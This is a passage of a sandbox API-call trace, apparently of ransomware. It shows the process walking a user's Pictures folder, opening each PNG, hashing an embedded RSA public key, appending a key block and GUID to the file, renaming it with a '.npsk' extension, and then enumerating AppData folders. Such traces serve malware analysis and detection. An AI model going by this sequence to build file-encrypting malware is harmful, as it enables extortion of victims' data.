ftLastAccessTime.dwLowDateTime=0x9dc22200, ftLastAccessTime.dwHighDateTime=0x1d5e0ac, ftLastWriteTime.dwLowDateTime=0x9dc22200, ftLastWriteTime.dwHighDateTime=0x1d5e0ac, nFileSizeHigh=0x0, nFileSizeLow=0x18a1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PLm_OXGJ-TrcTCPi9H7.png", cAlternateFileName="PLM_OX~1.PNG")) returned 1 [0217.475] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\PLm_OXGJ-TrcTCPi9H7.png") returned=".png" [0217.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\PLm_OXGJ-TrcTCPi9H7.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\plm_oxgj-trctcpi9h7.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.476] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=100894) returned 1 [0217.476] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.477] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x189f8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.477] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.479] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x18a1e, lpOverlapped=0x0) returned 1 [0217.480] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.480] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.480] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.480] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1c60) returned 1 [0217.481] CryptCreateHash (in: hProv=0x7b1c60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.481] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.481] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.481] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.481] GetLastError () returned 0x0 [0217.481] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.481] CryptReleaseContext (hProv=0x7b1c60, dwFlags=0x0) returned 1 [0217.481] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.481] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.481] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.482] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.483] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x18a1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.483] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.483] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.483] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.483] CloseHandle (hObject=0x61c) returned 1 [0217.486] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\PLm_OXGJ-TrcTCPi9H7.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\plm_oxgj-trctcpi9h7.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\PLm_OXGJ-TrcTCPi9H7.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\plm_oxgj-trctcpi9h7.png.npsk")) returned 1 [0217.488] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc55dd790, ftCreationTime.dwHighDateTime=0x1d5d8a6, ftLastAccessTime.dwLowDateTime=0xa33d1070, ftLastAccessTime.dwHighDateTime=0x1d5e019, ftLastWriteTime.dwLowDateTime=0xa33d1070, ftLastWriteTime.dwHighDateTime=0x1d5e019, nFileSizeHigh=0x0, nFileSizeLow=0x16903, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qBi7VQQXKZZObkPc.png", cAlternateFileName="QBI7VQ~1.PNG")) returned 1 [0217.488] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\qBi7VQQXKZZObkPc.png") returned=".png" [0217.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\qBi7VQQXKZZObkPc.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\qbi7vqqxkzzobkpc.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.488] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=92419) returned 1 [0217.488] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.490] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x168dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.490] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.492] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x16903, lpOverlapped=0x0) returned 1 [0217.493] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.493] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.493] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.493] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1c60) returned 1 [0217.494] CryptCreateHash (in: hProv=0x7b1c60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.494] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.494] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.494] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.494] GetLastError () returned 0x0 [0217.494] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.494] CryptReleaseContext (hProv=0x7b1c60, dwFlags=0x0) returned 1 [0217.494] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.494] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.494] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.495] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.496] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16903, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.496] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.496] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.496] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.496] CloseHandle (hObject=0x61c) returned 1 [0217.499] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\qBi7VQQXKZZObkPc.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\qbi7vqqxkzzobkpc.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\m8MPhSNWcQuWMqMN Jsf\\qBi7VQQXKZZObkPc.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\m8mphsnwcquwmqmn jsf\\qbi7vqqxkzzobkpc.png.npsk")) returned 1 [0217.501] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc55dd790, ftCreationTime.dwHighDateTime=0x1d5d8a6, ftLastAccessTime.dwLowDateTime=0xa33d1070, ftLastAccessTime.dwHighDateTime=0x1d5e019, ftLastWriteTime.dwLowDateTime=0xa33d1070, ftLastWriteTime.dwHighDateTime=0x1d5e019, nFileSizeHigh=0x0, nFileSizeLow=0x16903, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qBi7VQQXKZZObkPc.png", cAlternateFileName="QBI7VQ~1.PNG")) returned 0 [0217.501] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.501] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.502] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.502] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0217.502] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0217.502] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.502] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.502] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.502] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.502] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.502] PathFindFileNameW (pszPath="") returned="" [0217.502] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.503] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.503] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0217.503] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0217.503] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.503] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.503] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.503] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0217.503] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0217.503] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.503] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.503] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.503] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.503] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.504] PathFindFileNameW (pszPath="") returned="" [0217.504] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.504] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.504] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0217.504] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 0 [0217.504] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.504] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.504] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.504] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0217.504] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0217.504] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.505] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.505] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.505] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.505] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.505] PathFindFileNameW (pszPath="") returned="" [0217.505] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.506] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.506] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0217.506] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, 